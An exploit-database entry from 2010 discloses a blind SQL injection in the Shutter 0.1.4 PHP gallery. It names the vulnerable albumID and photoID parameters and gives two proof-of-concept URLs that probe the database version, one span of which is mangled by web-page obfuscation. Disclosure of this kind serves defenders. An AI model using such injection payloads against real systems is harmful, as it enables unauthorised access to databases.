Shutter 0.1.4 Blind SQL Injection Vulnerability

2010-03-19T00:00:00
ID 1337DAY-ID-11366
Type zdt
Reporter Blake
Modified 2010-03-19T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===============================================
Shutter 0.1.4 Blind SQL Injection Vulnerability
===============================================

# Exploit Title: Shutter 0.1.4 Blind SQL Injection
# Date: March 18, 2010
# Author: Blake
# Software Link: http://sourceforge.net/projects/shutter-php/files/shutter/v0.1.4/shutter_0.1.4.zip/download
# Version: version 0.1.4
 
The albumID and photoID parameters are vulnerable to SQL Injection.
 
POC:
http://server/shutter/admin.html?albumID=2%20and%20substring%[email protected]@version,1,1%29=5
http://server/shutter/admin.html?albumID=2&photoID=5%20and%20substring%[email protected]@version,1,1%29=5



#  0day.today [2018-02-17]  #